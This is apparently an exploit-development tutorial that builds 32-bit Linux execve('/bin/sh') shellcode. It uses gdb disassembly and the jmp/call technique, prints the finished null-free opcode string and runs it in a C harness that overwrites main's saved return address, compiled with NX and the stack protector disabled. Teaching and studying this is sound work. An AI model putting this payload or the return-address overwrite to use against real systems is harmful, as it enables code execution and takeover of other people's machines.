Shellcode is a sequence of carefully crafted machine instructions (byte code) that executes once it has been injected into a running application. It is called "shellcode" because it typically starts a command shell from which the attacker can control the compromised machine, but any piece of code that performs a similar task can be called shellcode.
TestBox : Ubuntu x86 16.04 LTS
In this post we will write simple shellcode that invokes a shell. First, we write a C program that starts a shell:
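#include <stdio.h>
#include <unistd.h>   /* declares execve() */
int main() {
    char *name[2];
    name[0] = "/bin/sh";   /* program to run; also argv[0] */
    name[1] = NULL;        /* argv must end with a NULL pointer */
    execve(name[0], name, NULL);
}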
The above code uses the execve() system call to start a shell. execve() executes the program named by its first argument. The syntax of the execve() system call is:
int execve(const char *filename, char *const argv[], char *const envp[]);
where the first argument, "filename", points to the path of the program to be executed, the second argument, "argv", is an array of argument strings passed to the new program, and the third argument, "envp", points to the environment variables passed to the new program. Both of the last two arguments, "argv" and "envp", are arrays that must be terminated by a null pointer. For more information about execve() see the man page ('man execve'). Now let's compile the above program:
gcc -static -o shell shell.c
The '-static' flag links the C library statically, so the code of execve() is included in the compiled binary and can be disassembled later. Let's run the program:
ajay@box:~/sc$ ./shell
$
$ exit
Now start gdb, load the compiled binary and disassemble the main routine:
ajay@box:~/sc$ gdb -q
(gdb) file shell
Reading symbols from /home/ajay/sc/shell...(no debugging symbols found)...done.
(gdb) disas main
Dump of assembler code for function main:
0x08048ee0 <+0>: push %ebp [1]
0x08048ee1 <+1>: mov %esp,%ebp [2]
0x08048ee3 <+3>: and $0xfffffff0,%esp
0x08048ee6 <+6>: sub $0x20,%esp [3]
0x08048ee9 <+9>: movl $0x80c3be8,0x18(%esp) [4]
0x08048ef1 <+17>: movl $0x0,0x1c(%esp) [5]
0x08048ef9 <+25>: mov 0x18(%esp),%eax [6]
0x08048efd <+29>: movl $0x0,0x8(%esp) [7]
0x08048f05 <+37>: lea 0x18(%esp),%edx [8]
0x08048f09 <+41>: mov %edx,0x4(%esp) [9]
0x08048f0d <+45>: mov %eax,(%esp) [10]
0x08048f10 <+48>: call 0x8053a20 <execve> [11]
0x08048f15 <+53>: leave
0x08048f16 <+54>: ret
End of assembler dump.
(gdb)
Lines [1] and [2] form the function prologue: line [1] pushes ebp onto the stack, and line [2] copies the current esp into ebp. The unnumbered instruction that follows aligns esp to a 16-byte boundary. Line [3] subtracts 0x20 (32) from esp, reserving 32 bytes of stack for the name array and for the arguments of the call to execve().
At line [4] the address 0x80c3be8 is copied to 0x18(%esp), which is 24 bytes (0x18) above the current esp. This slot is name[0], and the address 0x80c3be8 points to the string "/bin/sh":
(gdb) x/s 0x080c3be8
0x80c3be8: "/bin/sh"
At line [5] a null value is copied to 0x1c(%esp), which is 28 bytes (0x1c) above the current esp. This slot is name[1].
At line [6] the value stored at 0x18(%esp) is copied into the eax register, so eax = 0x80c3be8. At line [7] a null value is copied to 0x8(%esp); this is the third argument of execve(), envp.
At line [8] the address of the slot 0x18(%esp) is loaded into the edx register. Note that 0x18(%esp) contains 0x80c3be8, the pointer to "/bin/sh", but the 'lea' (Load Effective Address) instruction copies only the address of that slot, not its contents. So edx holds the address of the pointer to "/bin/sh", that is, the address of the name array. At line [9] the value of edx is copied to 0x4(%esp), the second argument, argv.
At line [10] the value of eax is copied to (%esp), the first argument, filename.
At line [11] the execve() function is called. A call instruction pushes the address of the next instruction onto the stack, in this case the address of leave (0x08048f15), and then transfers control to execve(). The two remaining instructions, leave and ret, are the function epilogue; they run only if execve() fails and returns. Let's disassemble the execve function:
(gdb) disas execve
Dump of assembler code for function execve:
0x08053a20 <+0>: push %ebx [1]
0x08053a21 <+1>: mov 0x10(%esp),%edx [2]
0x08053a25 <+5>: mov 0xc(%esp),%ecx [3]
0x08053a29 <+9>: mov 0x8(%esp),%ebx [4]
0x08053a2d <+13>: mov $0xb,%eax [5]
0x08053a32 <+18>: call *0x80ed5a4 [6]
0x08053a38 <+24>: cmp $0xfffff000,%eax
0x08053a3d <+29>: ja 0x8053a41 <execve+33>
0x08053a3f <+31>: pop %ebx
0x08053a40 <+32>: ret
0x08053a41 <+33>: mov $0xffffffe8,%edx
0x08053a47 <+39>: neg %eax
0x08053a49 <+41>: mov %gs:0x0,%ecx
0x08053a50 <+48>: mov %eax,(%ecx,%edx,1)
0x08053a53 <+51>: or $0xffffffff,%eax
0x08053a56 <+54>: pop %ebx
0x08053a57 <+55>: ret
End of assembler dump.
At line [1] the value of the ebx register is pushed onto the stack. With the saved ebx at (%esp) and the return address at 0x4(%esp), the three arguments are at 0x8(%esp), 0xc(%esp) and 0x10(%esp).
Line [2] copies the value at 0x10(%esp) (16 bytes above the current esp) into edx, so EDX = NULL (envp).
Line [3] copies the value at 0xc(%esp) (12 bytes above the current esp) into ecx, so ECX = the address of the pointer to "/bin/sh" (argv).
Line [4] copies the value at 0x8(%esp) (8 bytes above the current esp) into ebx, so EBX = the address of the string "/bin/sh".
Line [5] puts the value 11 (0xb) in eax, which is the system call number of execve(). EAX = 11.
The unistd_32.h header contains the system call numbers:
ajay@box:~/sc$ cat /usr/include/i386-linux-gnu/asm/unistd_32.h | grep execve
#define __NR_execve 11
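At line [6] the function calls through a pointer stored at 0x80ed5a4, which the C library uses to enter the kernel; in shellcode the same step is done directly with the 'int $0x80' software interrupt. So in order to get a shell we need these things:
# The system call number 11 in EAX
# The address of the string [full path of the file to execute] in EBX
# The address of an argument array (a pointer to the string, followed by a null pointer) in ECX
# The address of an environment array in EDX (a null pointer, as in the C program, or a pointer to a null word, as in the code below)
and then raise the interrupt with 'int $0x80'. Here is the assembly code: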
1: .text
2: .globl _start
3: _start:
4: jmp Mycall
5: shellcode:
6: popl %esi
7: xorl %eax, %eax
8: movb %al, 0x7(%esi)
9: movl %esi, 0x8(%esi)
10: movl %eax, 0xc(%esi)
11: movb $11, %al
12: movl %esi, %ebx
13: leal 0x8(%esi), %ecx
14: leal 0xc(%esi), %edx
15: int $0x80
16:
17: Mycall:
18: call shellcode
19: shellvar:
20: .ascii "/bin/shABBBBCCCC"
Explanation of the above code: Execution starts at line 4, 'jmp Mycall', which jumps to the Mycall label defined at line 17. At line 18, 'call shellcode' pushes the address of whatever follows the call onto the stack and jumps back to the shellcode label at line 5. What follows the call is not an instruction but our string, plus some extra space for other values (line 20), so the address now on top of the stack is the address of the string. This jmp/call pair lets the code find its own data wherever it is loaded in memory.
At line 6, 'popl %esi' pops that saved return address from the stack into the ESI register, so ESI holds the address of our string. At line 7, 'xorl %eax, %eax' XORs eax with itself, which leaves 0 in eax. This is used instead of 'movl $0x0, %eax' because the encoding of that mov contains null bytes, which would cut the shellcode short when it is copied as a C string; the xor is also shorter. Line 8 copies the al register to 0x7(%esi). eax contains 0, so this writes a null byte over the 'A' and terminates the string "/bin/sh".
Line 9 copies the value of esi, the address of our string, to 0x8(%esi), overwriting "BBBB". This is the pointer to the string (argv[0]).
Line 10 copies a doubleword null value to 0xc(%esi), overwriting "CCCC". This is the null pointer that ends the argument array.
Line 11 moves the byte value 11, the system call number of execve, into the al register. Writing only al again keeps null bytes out of the encoding.
Line 12 copies the address of the string from esi into ebx. Only the first 7 bytes at 0x0(%esi) belong to the string, because the 8th byte is now a null byte and terminates it.
Line 13 loads the effective address 0x8(%esi) into ecx, which is the address of the pointer to the string.
Line 14 loads the effective address 0xc(%esi) into edx, which is the address of the null doubleword.
Now we have
EAX = 11 [system call number of execve]
EBX = address of the string "/bin/sh"
ECX = address of the pointer to the string
EDX = address of a null doubleword
At line 15 the interrupt is raised and the kernel executes the system call. So let's assemble and link it.
ajay@box:~/sc$ as -o shellcode.o shellcode.s
ajay@box:~/sc$ ld -o shellcode shellcode.o
Then dump the opcodes using objdump:
ajay@box:~/sc$ objdump -d shellcode
shellcode: file format elf32-i386
Disassembly of section .text:
08048054 <_start>:
8048054: eb 18 jmp 804806e <Mycall>
08048056 <shellcode>:
8048056: 5e pop %esi
8048057: 31 c0 xor %eax,%eax
8048059: 88 46 07 mov %al,0x7(%esi)
804805c: 89 76 08 mov %esi,0x8(%esi)
804805f: 89 46 0c mov %eax,0xc(%esi)
8048062: b0 0b mov $0xb,%al
8048064: 89 f3 mov %esi,%ebx
8048066: 8d 4e 08 lea 0x8(%esi),%ecx
8048069: 8d 56 0c lea 0xc(%esi),%edx
804806c: cd 80 int $0x80
0804806e <Mycall>:
804806e: e8 e3 ff ff ff call 8048056 <shellcode>
08048073 <shellvar>:
8048073: 2f das
8048074: 62 69 6e bound %ebp,0x6e(%ecx)
8048077: 2f das
8048078: 73 68 jae 80480e2 <shellvar+0x6f>
804807a: 41 inc %ecx
804807b: 42 inc %edx
804807c: 42 inc %edx
804807d: 42 inc %edx
804807e: 42 inc %edx
804807f: 43 inc %ebx
8048080: 43 inc %ebx
8048081: 43 inc %ebx
8048082: 43 inc %ebx
Now write down the opcodes. The bytes after shellvar are the string data, which objdump decodes as if they were instructions:
"\xeb\x18\x5e\x31\xc0\x88\x46\x07\x89\x76\x08\x89\x46\x0c\xb0\x0b\x89\xf3"
"\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\xe8\xe3\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73"
"\x68\x41\x42\x42\x42\x42\x43\x43\x43\x43"
Testing the shellcode (shellrun.c):
char shellcode[] = "\xeb\x18\x5e\x31\xc0\x88\x46\x07\x89\x76\x08\x89\x46\x0c\xb0\x0b\x89\xf3"
"\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\xe8\xe3\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73"
"\x68\x41\x42\x42\x42\x42\x43\x43\x43\x43";
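int main() {
    int *ret;
    ret = (int *)&ret + 2;     /* point ret at the saved return address of main */
    (*ret) = (int)shellcode;   /* overwrite it with the address of the shellcode */
}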
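Now compile the code with the '-z execstack' flag, which disables the NX (Non-Executable) protection; otherwise our shellcode would not run. The '-fno-stack-protector' flag turns off GCC's stack protector, which could otherwise change the stack layout that the test program relies on.
ajay@box:~/sc$ gcc -o shellrun shellrun.c -z execstack -fno-stack-protector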
ajay@box:~/sc$ ./shellrun
$
$
Our shellcode worked. In the above code (shellrun.c) we simply define our shellcode as a char array. After the first statement of main, 'int *ret;', the local variable ret sits on the stack just below the saved ebp, which in turn sits just below the return address of main.
To execute our shellcode we need to overwrite that return address with the address of our shellcode. The next statement, "ret = (int *)&ret + 2;", takes the address of the ret variable, adds 2 ints (32 bits each), that is 8 bytes, to it, and stores the result in ret itself. Now ret contains the address of the return address [into libc_start_main], which is exactly 8 bytes above the location of the ret variable on the stack.
The last statement, "(*ret) = (int)shellcode;", stores the address of our shellcode in place of the libc return address.
Now the return address is the shellcode's address, so when main returns, execution continues in the shellcode. In the above shellcode we can also remove the last 9 bytes ("ABBBBCCCC") to shorten it. They are only placeholders that the shellcode overwrites at run time, so the shortened version writes to the memory just past the string instead, which must be writable:
"\xeb\x18\x5e\x31\xc0\x88\x46\x07\x89\x76\x08\x89\x46\x0c\xb0\x0b\x89\xf3"
"\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\xe8\xe3\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73"
"\x68"